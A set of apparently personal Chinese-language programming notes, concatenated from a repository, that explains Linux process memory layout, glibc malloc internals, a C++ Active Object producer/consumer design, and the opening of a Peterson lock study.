(relevant reading: >[stack and cache question](http://www.gamedev.net/topic/564817-stack-and-cache-question-optimizing-sw-in-c/#entry4617168) >[c++ stack memory and cpu cache](http://stackoverflow.com/questions/23760725/c-stack-memory-and-cpu-cache))
20 | If you are a careful reader, you may ask: why does the `TEXT` segment start at `0x08048000`? __Here is the explanation__:
21 | Use `cat /proc/self/maps` to inspect the memory map of the current process (here, the `cat` process itself).
22 | On a 32-bit system it looks like this:
23 | ``` 24 | 001c0000-00317000 r-xp 00000000 08:01 245836 /lib/libc-2.12.1.so 25 | 00317000-00318000 ---p 00157000 08:01 245836 /lib/libc-2.12.1.so 26 | 00318000-0031a000 r--p 00157000 08:01 245836 /lib/libc-2.12.1.so 27 | 0031a000-0031b000 rw-p 00159000 08:01 245836 /lib/libc-2.12.1.so 28 | 0031b000-0031e000 rw-p 00000000 00:00 0 29 | 00376000-00377000 r-xp 00000000 00:00 0 [vdso] 30 | 00852000-0086e000 r-xp 00000000 08:01 245783 /lib/ld-2.12.1.so 31 | 0086e000-0086f000 r--p 0001b000 08:01 245783 /lib/ld-2.12.1.so 32 | 0086f000-00870000 rw-p 0001c000 08:01 245783 /lib/ld-2.12.1.so 33 | 08048000-08051000 r-xp 00000000 08:01 2244617 /bin/cat 34 | 08051000-08052000 r--p 00008000 08:01 2244617 /bin/cat 35 | 08052000-08053000 rw-p 00009000 08:01 2244617 /bin/cat 36 | 09ab5000-09ad6000 rw-p 00000000 00:00 0 [heap] 37 | b7502000-b7702000 r--p 00000000 08:01 4456455 /usr/lib/locale/locale-archive 38 | b7702000-b7703000 rw-p 00000000 00:00 0 39 | b771b000-b771c000 r--p 002a1000 08:01 4456455 /usr/lib/locale/locale-archive 40 | b771c000-b771e000 rw-p 00000000 00:00 0 41 | bfbd9000-bfbfa000 rw-p 00000000 00:00 0 [stack] 42 | ``` 43 | Below `0x08048000` are the libraries the kernel mapped for syscalls; in fact, you can `map` anything you like into this region, all `128M` of it.
44 | On a 64-bit system it looks like this:
45 | ``` 46 | 00400000-0040b000 r-xp 00000000 ca:01 400116 /bin/cat 47 | 0060a000-0060c000 rw-p 0000a000 ca:01 400116 /bin/cat 48 | 0062c000-0064d000 rw-p 00000000 00:00 0 [heap] 49 | 7f38ab82e000-7f38b1d55000 r--p 00000000 ca:01 454475 /usr/lib/locale/locale-archive 50 | 7f38b1d55000-7f38b1f0c000 r-xp 00000000 ca:01 396116 /lib64/libc-2.17.so 51 | 7f38b1f0c000-7f38b210c000 ---p 001b7000 ca:01 396116 /lib64/libc-2.17.so 52 | 7f38b210c000-7f38b2110000 r--p 001b7000 ca:01 396116 /lib64/libc-2.17.so 53 | 7f38b2110000-7f38b2112000 rw-p 001bb000 ca:01 396116 /lib64/libc-2.17.so 54 | 7f38b2112000-7f38b2117000 rw-p 00000000 00:00 0 55 | 7f38b2117000-7f38b2138000 r-xp 00000000 ca:01 396509 /lib64/ld-2.17.so 56 | 7f38b2323000-7f38b2326000 rw-p 00000000 00:00 0 57 | 7f38b2337000-7f38b2338000 rw-p 00000000 00:00 0 58 | 7f38b2338000-7f38b2339000 r--p 00021000 ca:01 396509 /lib64/ld-2.17.so 59 | 7f38b2339000-7f38b233a000 rw-p 00022000 ca:01 396509 /lib64/ld-2.17.so 60 | 7f38b233a000-7f38b233b000 rw-p 00000000 00:00 0 61 | 7ffcffe94000-7ffcffeb5000 rw-p 00000000 00:00 0 [stack] 62 | 7ffcfffa1000-7ffcfffa3000 r-xp 00000000 00:00 0 [vdso] 63 | ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] 64 | ``` 65 | Here `libc` and `ld` are mapped into the `mmap` region well above the heap; below `0x00400000` there may or may not be anything, and you can likewise `map` whatever you want into that area. 66 | An even more careful reader may ask: why the `random brk offset`, `random stack offset` and `random mmap offset`? They exist so that nobody can directly compute a process's exact `virtual memory` addresses and use them for a remote `PWN` (I can't do it anyway; gurus are welcome to teach me ^_^).
66 | 更加细心的读者可能要问:为什么要有`random brk offset`,`random stack offset`和`random mmap offset`?这是为了避免直接算得某个进程的`virtual memory`详细地址,然后可以利用这个远程`PWN`(反正我不会,大牛可以教教我^_^)。
67 |
68 | 69 |    

70 | 这个图是更加详细的解释,`const char *msg="I am a nerd!"`,`msg`会存在`DATA`段,`"I am a nerd!"`存在`TEXT`段,是只读的。可执行文件大小 = `TEXT` + `DATA`!
71 |
72 | 73 |    

74 | 这个是经典的没有各种`offset`的`virtual memory` layout。
75 |
76 | 77 |    
78 |
79 |    

80 | 我就不解释了,不会kernel,详情自己看[relevant reading: How the Kernel Manages Your Memory](#relevant-reading) 81 | 82 | ## Dinner time: Memory allocator and memory management of glibc 83 | 84 | - `glibc`内存管理基于`ptmalloc`,`ptmalloc`基于`dlmalloc` 85 | - `dlmalloc`源码:[dlmalloc](https://github.com/linghuazaii/dlmalloc) 86 | - `ptmalloc`源码:[ptmalloc](http://www.malloc.de/malloc/ptmalloc3-current.tar.gz) 87 |

88 | ``` 89 | struct malloc_chunk { 90 | 91 | INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ 92 | INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ 93 | 94 | struct malloc_chunk* fd; /* double links -- used only if free. */ 95 | struct malloc_chunk* bk; 96 | }; 97 | ``` 98 | `dlmalloc`使用`malloc_chunk`结构体存储每块申请的内存的具体信息,在32位系统里`sizeof(malloc_chunk) = 16`,在64位系统里`sizeof(malloc_chunk) = 32`,**example:**
99 | ``` 100 | int main(int argc, char **argv) { 101 | void *mem = malloc(0); 102 | malloc_stats(); 103 | 104 | return 0; 105 | } 106 | ``` 107 | 我的机器是64位的,调用`malloc(0)`其实也申请了内存,这块内存空间大小就是`sizeof(malloc_chunk) = 32`,运行以上代码将显示如下结果:
108 | > Arena 0:
109 | > system bytes = 135168
110 | > **in use bytes = 32**
111 | > Total (incl. mmap):
112 | > system bytes = 135168
113 | > in use bytes = 32
114 | > max mmap regions = 0
115 | > max mmap bytes = 0
116 | 117 | 所以,你申请的内存看上去是这样子的。
118 |    

119 | 120 | ``` 121 | struct malloc_state { 122 | /* The maximum chunk size to be eligible for fastbin */ 123 | INTERNAL_SIZE_T max_fast; /* low 2 bits used as flags */ 124 | /* Fastbins */ 125 | mfastbinptr fastbins[NFASTBINS]; 126 | /* Base of the topmost chunk -- not otherwise kept in a bin */ 127 | mchunkptr top; 128 | /* The remainder from the most recent split of a small request */ 129 | mchunkptr last_remainder; 130 | /* Normal bins packed as described above */ 131 | mchunkptr bins[NBINS * 2]; 132 | /* Bitmap of bins. Trailing zero map handles cases of largest binned size */ 133 | unsigned int binmap[BINMAPSIZE+1]; 134 | /* Tunable parameters */ 135 | CHUNK_SIZE_T trim_threshold; 136 | INTERNAL_SIZE_T top_pad; 137 | INTERNAL_SIZE_T mmap_threshold; 138 | /* Memory map support */ 139 | int n_mmaps; 140 | int n_mmaps_max; 141 | int max_n_mmaps; 142 | /* Cache malloc_getpagesize */ 143 | unsigned int pagesize; 144 | /* Track properties of MORECORE */ 145 | unsigned int morecore_properties; 146 | /* Statistics */ 147 | INTERNAL_SIZE_T mmapped_mem; 148 | INTERNAL_SIZE_T sbrked_mem; 149 | INTERNAL_SIZE_T max_sbrked_mem; 150 | INTERNAL_SIZE_T max_mmapped_mem; 151 | INTERNAL_SIZE_T max_total_mem; 152 | }; 153 | 154 | typedef struct malloc_state *mstate; 155 | static struct malloc_state av_; 156 | ``` 157 | 这个名叫`av_`的结构体就是用来存储内存申请的具体信息的,无论是`brk`的也好,还是`mmap`的也好,都会记录在案。
158 |
159 | 160 | **关于malloc**
161 | - 当你调用`malloc`时,`dlmalloc`首先确定`mstate.fastbins`和`mstate.bins`有没有满足需求的内存块大小,有就可以直接使用。如果`malloc`申请内存大小超过`M_MMAP_THRESHOLD`即`128 * 1024`并且`free list`里没有满足需要的内存大小,`malloc`就会调用`mmap`申请内存。因为有一个`header`,所以大小为`128 * 1024 - 32`,具体信息可以`man mallopt`,我就不贴`dlmalloc`的源码了,感兴趣可以自己去翻。**example:(strace跟踪系统调用)**
162 | ``` 163 | int main(int argc, char **argv) { 164 | void *mem = malloc(1024 * 128 - 24); 165 | malloc_stats(); 166 | 167 | return 0; 168 | } 169 | ``` 170 | 编译以上代码,`strace`结果:
171 | > brk(0) = 0xa2c000
172 | > brk(0xa6d000) = 0xa6d000
173 | 174 | ``` 175 | int main(int argc, char **argv) { 176 | void *mem = malloc(1024 * 128 - 24 + 1); 177 | malloc_stats(); 178 | 179 | return 0; 180 | } 181 | ``` 182 | 编译以上代码,`strace`结果:
183 | > mmap(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f65339a6000
184 | 185 | 为什么是24而不是`sizeof(malloc_chunk)`,我猜`glibc`修改了`dlmalloc`实现,因为我看到的`dlmalloc`源码不是这样子的。
186 |
187 | 188 | **关于malloc_trim**
189 | - `malloc_trim`用来归还申请的内存给系统,但是只归还通过`brk`申请的内存块,归还大小为`N * PAGE_SZIE`,一般linux的`PAGE_SIZE`为4096Bytes,详情可以`man getpagesize`。
190 |
191 | 192 | **关于free**
193 | - `free`归还通过`brk`申请的内存到`mstate.fastbin`,如果`free`的内存是通过`brk`申请的并且其大小超过了`FASTBIN_CONSOLIDATION_THRESHOLD`即`DEFAULT_TRIM_THRESHOLD >> 1`即`256 * 1024 / 2`即`128K`,那么这块内存会通过`brk`缩减`program break`的方式直接归还给系统,`mmap`申请的内存直接通过`munmap`归还给系统。
194 |
195 | 196 | **关于realloc**
197 | - `realloc`嘛,自己`man realloc`吧,就是`malloc + memcpy`,但是此`memcpy`非彼`memcpy`,此`memcpy`是通过宏定义来实现的,代码如下:
198 | ``` 199 | #define MALLOC_COPY(dest,src,nbytes) \ 200 | do { \ 201 | INTERNAL_SIZE_T* mcsrc = (INTERNAL_SIZE_T*) src; \ 202 | INTERNAL_SIZE_T* mcdst = (INTERNAL_SIZE_T*) dest; \ 203 | CHUNK_SIZE_T mctmp = (nbytes)/sizeof(INTERNAL_SIZE_T); \ 204 | long mcn; \ 205 | if (mctmp < 8) mcn = 0; else { mcn = (mctmp-1)/8; mctmp %= 8; } \ 206 | switch (mctmp) { \ 207 | case 0: for(;;) { *mcdst++ = *mcsrc++; \ 208 | case 7: *mcdst++ = *mcsrc++; \ 209 | case 6: *mcdst++ = *mcsrc++; \ 210 | case 5: *mcdst++ = *mcsrc++; \ 211 | case 4: *mcdst++ = *mcsrc++; \ 212 | case 3: *mcdst++ = *mcsrc++; \ 213 | case 2: *mcdst++ = *mcsrc++; \ 214 | case 1: *mcdst++ = *mcsrc++; if(mcn <= 0) break; mcn--; } \ 215 | } \ 216 | } while(0) 217 | ``` 218 |
219 | 220 | **关于memalign**
221 | - Hard to follow; let's skip it. In any case it is implemented with bit manipulation.
222 |
223 | 224 | **关于calloc**
225 | - `calloc`先调用`malloc`,然后调用`memset`,但是此`memset`非彼`memset`,此`memset`是通过宏定义实现的,代码如下:
226 | ``` 227 | #define MALLOC_ZERO(charp, nbytes) \ 228 | do { \ 229 | INTERNAL_SIZE_T* mzp = (INTERNAL_SIZE_T*)(charp); \ 230 | CHUNK_SIZE_T mctmp = (nbytes)/sizeof(INTERNAL_SIZE_T); \ 231 | long mcn; \ 232 | if (mctmp < 8) mcn = 0; else { mcn = (mctmp-1)/8; mctmp %= 8; } \ 233 | switch (mctmp) { \ 234 | case 0: for(;;) { *mzp++ = 0; \ 235 | case 7: *mzp++ = 0; \ 236 | case 6: *mzp++ = 0; \ 237 | case 5: *mzp++ = 0; \ 238 | case 4: *mzp++ = 0; \ 239 | case 3: *mzp++ = 0; \ 240 | case 2: *mzp++ = 0; \ 241 | case 1: *mzp++ = 0; if(mcn <= 0) break; mcn--; } \ 242 | } \ 243 | } while(0) 244 | ``` 245 | 说实话,这个我没看太懂。
246 |
247 | 248 | **结语**
249 | - 就到这里吧,大家有什么感兴趣的想学的东西可以发邮件到我的email:[charles.cn.bj@gmail.com](charles.cn.bj@gmail.com) 250 | - Google有自己的`tcmalloc`,GNU有自己通过`ptmalloc`改编的`malloc`,市面上还有`jemalloc`等等其他的`memory allocator`,写完这篇,我也要去写个`charles_malloc`了,Byebye…… 251 | -------------------------------------------------------------------------------- /parallel-programming-active_object_design_pattern.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]Active Object Design Pattern 2 | =================================================== 3 | 4 | ### 前言 5 |   试着思考这样一个问题,假设我们有一个文字处理应用,点击保存按钮的时候,不要阻塞在保存这里,而是将保存按钮灰色显示,等到保存功能完成后,自动将保存按钮恢复正常显示。在单线程版本下,必须得等保存完成,这对任何GUI来说都是致命的。或许你会说,这期起一个后台线程去做保存功能,可以是可以,但并不是一个好的设计。而Active Object Design Pattern或者说Concurrent Object Design Pattern就是用来做异步的设计,常用于GUI,Web Server的设计。本文要实现一个简易的Producer&Consumer的消息系统,当然并不是进程之间的,是进程内多线程之间的。 6 | 7 | ### Active Object Design Pattern 8 |   Active Object Design Pattern的核心思想就是函数调用和函数实现相分离,这样抽象出两个角色,一个是`Proxy`,另一个是`Servant`。`Proxy`负责所有Client的函数调用,`Servant`负责所有`Proxy`函数调用的具体实现。函数调用到函数实现是在不同的线程里完成,那么怎么实现一个同步呢?这里需要一个`ActiveObjectQueue`,这个队列里装的是所有从`Proxy`生成的Active Object。动态维护这个队列需要抽象出一个`Scheduler`,`Scheduler`负责将`Proxy`的Request加入到`ActiveObjectQueue`队列,并且一直循环分发这些Request到具体的`Servant`实现。在本例子中,我们将ActiveObject抽象为一个抽象类`MethodRequest`。而不同线程之间的消息传递抽象为`MessageFuture`,将所有的消息抽象为`Message`。以上文字可能并不能在你的脑海里勾画出一个完成的架构图,下面我们画一画架构图。 9 | 10 | ### 架构图 11 |    12 |   如图所示,只有Proxy对于Client是可见的,其他部分对于Client都是不可见的。可能这个图还是不能在你的脑海里勾勒出这个设计的所有细节,确实,我在学这个设计模式的时候,也懵逼了好久好久,知道我读到《[The Art Of MultiProcessor Programming](http://coolfire.insomnia247.nl/c&mt/Herlihy,%20Shavit%20-%20The%20art%20of%20multiprocessor%20programming.pdf)》里面的Concurrent Object的时候我才豁然开朗,实现了本文的例子。下面我们各个击破,将每个部分分解出来。 13 | 14 | ### Proxy 15 |   只有`Proxy`对于Client是可见的,以下是`Proxy`的实现。 16 | ```cpp 17 | #ifndef _PROXY_H 18 | #define _PROXY_H 19 | /* 20 | * File: proxy.h 21 | * Author: Charles, Liu. 
22 | * Mailto: charlesliu.cn.bj@gmail.com 23 | */ 24 | #include "servant.h" 25 | #include "method_request.h" 26 | #include "message.h" 27 | #include "message_future.h" 28 | #include "scheduler.h" 29 | #include "producer.h" 30 | #include "consumer.h" 31 | 32 | class Proxy { 33 | public: 34 | enum { MAX_SIZE = 1000 }; 35 | Proxy(size_t size = MAX_SIZE) { 36 | scheduler_ = new Scheduler(size); 37 | servant_ = new Servant(size); 38 | scheduler_->run(); 39 | } 40 | ~Proxy() { 41 | delete scheduler_; 42 | delete servant_; 43 | } 44 | void produce(Message &msg) { 45 | MethodRequest *method_request = new Producer(servant_, msg); 46 | scheduler_->enqueue(method_request); 47 | } 48 | MessageFuture * consume() { 49 | MessageFuture *result = new MessageFuture; 50 | MethodRequest *method_request = new Consumer(servant_, result); 51 | scheduler_->enqueue(method_request); 52 | return result; 53 | } 54 | private: 55 | Servant *servant_; 56 | Scheduler *scheduler_; 57 | }; 58 | 59 | 60 | #endif 61 | ``` 62 |   本例实现的是一个Producer&Consumer消息系统,所以Client只需要调用`produce()`和`consumer()`,所以Proxy只有`produce()`和`consume()`两个方法。`Proxy`有一个`Servant`实例,正如上文所说,`Proxy`负责函数调用,`Servant`负责函数实现。`Proxy`还有一个`Scheduler`实例,`Scheduler`负责将所有的Active Object加到`ActiveObjectQueue`队列。`produce()`调用生成一个叫`Producer`的Active Object,`consume()`生成一个`Consumer`的Active Object,并且返回一个`MessageFuture`实例,这个`MessageFuture`会在`Servant`调用其`consume()`方法之后填充`Message`。 63 | 64 | ### Message 65 |   本例中的`Message`就是`std::string`的一个type definition。 66 | ```cpp 67 | #ifndef _MESSAGE_H 68 | #define _MESSAGE_H 69 | /* 70 | * File: message.h 71 | * Description: type definition for Message 72 | * Autor: Charles, Liu. 
73 | * Mailto: charlesliu.cn.bj@gmail.com 74 | */ 75 | #include 76 | 77 | typedef std::string Message; 78 | 79 | #endif 80 | ``` 81 | 82 | ### MessageFuture 83 |   `MessageFuture`包含`consume()`填充的`Message`,并且包含一个`hasMessage()`方法用来判断`Message`是否填充,这样Consumer可以通过这个标志来轮询所有的`MessageFuture`,这样可以避免消息的丢失。 84 | ```cpp 85 | #ifndef _MESSAGE_FUTURE_H 86 | #define _MESSAGE_FUTURE_H 87 | /* 88 | * File: message_future.h 89 | * Description: type definition for class MessageFuture 90 | * Autor: Charles, Liu. 91 | * Mailto: charlesliu.cn.bj@gmail.com 92 | */ 93 | #include "message.h" 94 | 95 | class MessageFuture { 96 | public: 97 | MessageFuture() : has_message(false) {} 98 | ~MessageFuture() {} 99 | bool hasMessage() { 100 | return has_message; 101 | } 102 | Message getMessage() { 103 | return msg_; 104 | } 105 | void setMessage(Message &msg) { 106 | msg_ = msg; 107 | has_message = true; 108 | } 109 | private: 110 | Message msg_; 111 | bool has_message; 112 | }; 113 | 114 | #endif 115 | ``` 116 | 117 | ### Servant 118 |   `Servant`含有`Proxy`函数调用的具体实现,并且维护自己的消息FIFO队列,留给你一个问题思考:为什么`Servant`的`Message`队列不需要加锁?以此进一步思考Active Object Design Pattern做线程同步的本质。 119 | ```cpp 120 | #ifndef _SERVANT_H 121 | #define _SERVANT_H 122 | /* 123 | * File: servant.h 124 | * Author: Charles, Liu. 
125 | * Mailto: charlesliu.cn.bj@gmain.com 126 | */ 127 | #include 128 | #include "message.h" 129 | #include "message_future.h" 130 | using std::queue; 131 | 132 | class Servant { 133 | public: 134 | Servant(size_t mq_size) : size(mq_size) {} 135 | void produce(const Message &msg) { 136 | mq.push(msg); 137 | } 138 | void consume(MessageFuture *future) { 139 | Message msg = mq.front(); 140 | mq.pop(); 141 | future->setMessage(msg); 142 | } 143 | bool empty() { 144 | return (mq.size() == 0); 145 | } 146 | bool full() { 147 | return (mq.size() == size); 148 | } 149 | private: 150 | queue mq; 151 | size_t size; 152 | }; 153 | 154 | #endif 155 | ``` 156 |   同时`Servant`还有一个`empty()`方法和一个`full()`方法用来检测消息队列的状态。 157 | 158 | ### MethodRequest 159 |   `MethodRequest`是所有Active Object的抽象父类,所有Active Object派生于此。 160 | ```cpp 161 | #ifndef _METHOD_REQUEST_H 162 | #define _METHOD_REQUEST_H 163 | /* 164 | * File: method_request.h 165 | * Author: Charles, Liu. 166 | * Mailto: charlesliu.cn.bj@gmail.com 167 | */ 168 | 169 | class MethodRequest { 170 | public: 171 | virtual bool guard() = 0; 172 | virtual void call() = 0; 173 | }; 174 | 175 | #endif 176 | ``` 177 | 178 | ### Producer 179 |   `Producer`派生自`MethodRequest`,是具体的Active Object。 180 | ```cpp 181 | #ifndef _PRODUCER_H 182 | #define _PRODUCER_H 183 | /* 184 | * File: producer.h 185 | * Author: Charles, Liu. 
186 | * Mailto: charlesliu.cn.bj@gmail.com 187 | */ 188 | #include "servant.h" 189 | #include "method_request.h" 190 | #include "message.h" 191 | 192 | class Producer : public MethodRequest { 193 | public: 194 | Producer(Servant *servant, Message &msg) { 195 | servant_ = servant; 196 | msg_ = msg; 197 | } 198 | virtual bool guard() { 199 | return !servant_->full(); 200 | } 201 | virtual void call() { 202 | servant_->produce(msg_); 203 | } 204 | private: 205 | Servant *servant_; 206 | Message msg_; 207 | }; 208 | 209 | #endif 210 | ``` 211 | 212 | ### Consumer 213 |   `Consumer`派生自`MethodReqeust`,是具体的Active Object。 214 | ```cpp 215 | #ifndef _CONSUMER_H 216 | #define _CONSUMER_H 217 | /* 218 | * File: consumer.h 219 | * Author: Charles, Liu. 220 | * Mailto: charlesli.cn.bj@gmail.com 221 | */ 222 | #include "servant.h" 223 | #include "method_request.h" 224 | #include "message.h" 225 | #include "message_future.h" 226 | 227 | class Consumer : public MethodRequest { 228 | public: 229 | Consumer(Servant *servant, MessageFuture *future) { 230 | servant_ = servant; 231 | future_ = future; 232 | } 233 | virtual bool guard() { 234 | return !servant_->empty(); 235 | } 236 | virtual void call() { 237 | servant_->consume(future_); 238 | } 239 | private: 240 | Servant *servant_; 241 | MessageFuture *future_; 242 | }; 243 | 244 | #endif 245 | ``` 246 | 247 | ### ActivationQueue 248 |   `ActivationQueue`是具体的Active Object队列,因为`Proxy`和`Scheduler`是在不同的线程独立运行,所以得加一把锁。 249 | ```cpp 250 | #ifndef _ACTIVATION_QUEUE_H 251 | #define _ACTIVATION_QUEUE_H 252 | /* 253 | * File: activation_queue.h 254 | * Author: Charles, Liu. 
255 | * Mailto: charlesliu.cn.bj@gmail.com 256 | */ 257 | #include <vector> 258 | #include <algorithm> 259 | #include "method_request.h" 260 | #include "lock.h" 261 | using std::vector; 262 | 263 | typedef vector<MethodRequest *> ACTIVATION_QUEUE; 264 | typedef vector<MethodRequest *>::iterator ACTIVATION_QUEUE_ITERATOR; 265 | 266 | class ActivationQueue { 267 | public: 268 | enum {INFINITE = -1}; 269 | ActivationQueue(size_t high_water_mark) { 270 | high_water_mark_ = high_water_mark; 271 | } 272 | ~ActivationQueue() { 273 | } 274 | void enqueue(MethodRequest *method_request, long msec_timeout = INFINITE) { 275 | int ret = 0; 276 | if (msec_timeout == INFINITE) 277 | lock.lock(); 278 | else 279 | ret = lock.timedlock(msec_timeout); 280 | 281 | if (ret != 0) /* timed out: the lock was never acquired, so don't touch the queue or unlock */ 282 | return; 283 | if (act_queue_.size() < high_water_mark_) 284 | act_queue_.push_back(method_request); 285 | 286 | lock.unlock(); 287 | } 288 | void dequeue(MethodRequest *method_request, long msec_timeout = INFINITE) { 289 | int ret = 0; 290 | if (msec_timeout == INFINITE) /* note: ==, not =; an assignment here would always take the blocking path */ 291 | lock.lock(); 292 | else 293 | ret = lock.timedlock(msec_timeout); 294 | 295 | if (ret != 0) 296 | return; 297 | ACTIVATION_QUEUE_ITERATOR iter = find(act_queue_.begin(), act_queue_.end(), method_request); 298 | if (iter != act_queue_.end()) 299 | act_queue_.erase(iter); 300 | 301 | lock.unlock(); 302 | } 303 | int size() { 304 | int count = 0; 305 | lock.lock(); 306 | count = act_queue_.size(); 307 | lock.unlock(); 308 | return count; 309 | } 310 | MethodRequest *at(size_t i) { 311 | MethodRequest *method_request; 312 | lock.lock(); 313 | method_request = act_queue_.at(i); 314 | lock.unlock(); 315 | return method_request; 316 | } 317 | private: 318 | ACTIVATION_QUEUE act_queue_; 319 | size_t high_water_mark_; 320 | Lock lock; 321 | }; 322 | 323 | #endif 324 | ``` 325 | 326 | ### Scheduler 327 |   `Scheduler` holds an `ActivationQueue` instance; the `Proxy` goes through the `Scheduler` to append concrete Active Objects to the `ActivationQueue`. When the `Scheduler` runs, it starts a thread that keeps watching the state of the Active Objects in the `ActivationQueue`; whenever a `guard()` succeeds, it invokes `call()` to run the concrete method in the `Servant`. 328 | ```cpp
329 | #ifndef _SCHEDULER_H 330 | #define _SCHEDULER_H 331 | /* 332 | * File: scheduler.h 333 | * Description: type definition for class Scheduler 334 | * Author: Charles, Liu. 335 | * Mailto: charlesliu.cn.bj@gmail.com 336 | */ 337 | #include "activation_queue.h" 338 | #include "method_request.h" 339 | #include <pthread.h> 340 | #include <cstdio> 341 | 342 | void* dispatch(void *arg); 343 | 344 | class Scheduler { 345 | public: 346 | Scheduler(size_t high_water_mark) { 347 | act_queue_ = new ActivationQueue(high_water_mark); 348 | svr_run = ::dispatch; 349 | } 350 | ~Scheduler() { 351 | delete act_queue_; 352 | } 353 | void enqueue(MethodRequest *method_request) { 354 | act_queue_->enqueue(method_request); 355 | } 356 | void run() { 357 | pthread_t thread_id; 358 | pthread_attr_t thread_attr; 359 | pthread_attr_init(&thread_attr); 360 | pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED); 361 | pthread_create(&thread_id, &thread_attr, svr_run, this); 362 | pthread_attr_destroy(&thread_attr); 363 | } 364 | void dispatch() { 365 | ACTIVATION_QUEUE mark_delete; 366 | for (;;) { 367 | int count = act_queue_->size(); 368 | for (int i = 0; i < count; ++i) { 369 | MethodRequest *method_request = act_queue_->at(i); 370 | if (method_request == NULL) 371 | printf("method request is NULL\n"); 372 | if (method_request->guard()) { 373 | mark_delete.push_back(method_request); 374 | method_request->call(); 375 | } 376 | } 377 | for (ACTIVATION_QUEUE_ITERATOR iter = mark_delete.begin(); iter != mark_delete.end(); ++iter) { 378 | act_queue_->dequeue(*iter); 379 | } 380 | mark_delete.clear(); /* forget dispatched requests, or stale pointers pile up across passes */ 381 | } 382 | } 383 | private: 384 | ActivationQueue *act_queue_; 385 | void *(*svr_run)(void *); 386 | }; 387 | 388 | void* dispatch(void *arg) { 389 | Scheduler *this_obj = (Scheduler *)arg; 390 | this_obj->dispatch(); 391 | return NULL; 392 | } 393 | 394 | #endif 395 | ``` 396 | 397 | ### Project Source 398 |   [Active Object project source](https://github.com/linghuazaii/parallel_programming/tree/master/active_object) 399 |   Compile with `g++ main.cpp -o active_object -lpthread`
  本例运行结果如下: 398 |    399 |   时间续consume所有的Message。 400 | 401 | ### Reference 402 | - [Active Object Design Pattern Wiki](https://en.wikipedia.org/wiki/Active_object) 403 | - [Active Object](http://www.cs.wustl.edu/~schmidt/PDF/Act-Obj.pdf) 404 | 405 | ### 结语 406 |   **Good Luck! Have Fun!!!!!!** 407 | -------------------------------------------------------------------------------- /parallel-programming-peterson_lock_report.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]Peterson Lock 研究报告 2 | =========================================== 3 | 4 | #### 作者信息 5 |   Charles, Liu  charlesliu.cn.bj@gmail.com  安远国际 6 |   Derek, Zhang  anonymous@anonymous.com  百度 7 | 8 | ### 前言 9 |   前段时间研究Peterson Lock的时候遇到了一些问题,就将问题抛给了前Mentor(Derek, Zhang)。经过两天的讨论,将所有的细节罗列在这份报告里面,对于所有的外部资料的引用,只会贴出链接,作者并不做任何形式的翻译或者转述,这样可以保证所有信息的准确性。 10 | 11 | ### Peterson Locking Algorithm实现 12 |   关于Peterson Locking Algorithm,请参考Wiki:[Peterson's algorithm](https://en.wikipedia.org/wiki/Peterson's_algorithm) 13 | ```c 14 | #ifndef _PETERSON_LOCK_H 15 | #define _PETERSON_LOCK_H 16 | /* 17 | * Description: implementing peterson's locking algorithm 18 | * File: peterson_lock.h 19 | * Author: Charles, Liu. 
20 | * Mailto: charlesliu.cn.bj@gmail.com 21 | */ 22 | #include 23 | 24 | typedef struct { 25 | volatile bool flag[2]; 26 | volatile int victim; 27 | } peterson_lock_t; 28 | 29 | void peterson_lock_init(peterson_lock_t &lock) { 30 | lock.flag[0] = lock.flag[1] = false; 31 | lock.victim = 0; 32 | } 33 | 34 | void peterson_lock(peterson_lock_t &lock, int id) { 35 | lock.flag[id] = true; 36 | lock.victim = id; 37 | while (lock.flag[1 - id] && lock.victim == id); 38 | } 39 | 40 | void peterson_unlock(peterson_lock_t &lock, int id) { 41 | lock.flag[id] = false; 42 | lock.victim = id; 43 | } 44 | 45 | #endif 46 | ``` 47 |   以下是测试程序: 48 | ```c 49 | #include 50 | #include "peterson_lock.h" 51 | 52 | peterson_lock_t lock; 53 | int count = 0; 54 | 55 | void *routine0(void *arg) { 56 | int *cnt = (int *)arg; 57 | for (int i = 0; i < *cnt; ++i) { 58 | peterson_lock(lock, 0); 59 | ++count; 60 | printf("count: %d", count); 61 | peterson_unlock(lock, 0); 62 | } 63 | 64 | return NULL; 65 | } 66 | 67 | void *routine1(void *arg) { 68 | int *cnt = (int *)arg; 69 | for (int i = 0; i < *cnt; ++i) { 70 | peterson_lock(lock, 1); 71 | ++count; 72 | peterson_unlock(lock, 1); 73 | } 74 | } 75 | 76 | int main(int argc, char **argv) { 77 | peterson_lock_init(lock); 78 | pthread_t thread0, thread1; 79 | int count0 = 10000; 80 | int count1 = 20000; 81 | pthread_create(&thread0, NULL, routine0, (void *)&count0); 82 | pthread_create(&thread1, NULL, routine1, (void *)&count1); 83 | 84 | pthread_join(thread0, NULL); 85 | pthread_join(thread1, NULL); 86 | 87 | printf("Expected: %d\n", (count0 + count1)); 88 | printf("Reality : %d\n", count); 89 | 90 | return 0; 91 | } 92 | ``` 93 |   如果你编译运行以上的测试,会发现Peterson Lock的实现并没有达到目的,原因就是编译时期和运行时期都会有指令重排的问题。 94 | 95 | ### Memory Ordering 96 |   这里我不打算讲Memory Ordering的具体细节,所有信息都在下面的链接里: 97 | - 这里是Memory Ordering的Wiki -> [Memory ordering](https://en.wikipedia.org/wiki/Memory_ordering) 98 | - 这里的一篇文章讲到了Memory Ordering和Peterson Lock的问题 -> [Who ordered memory 
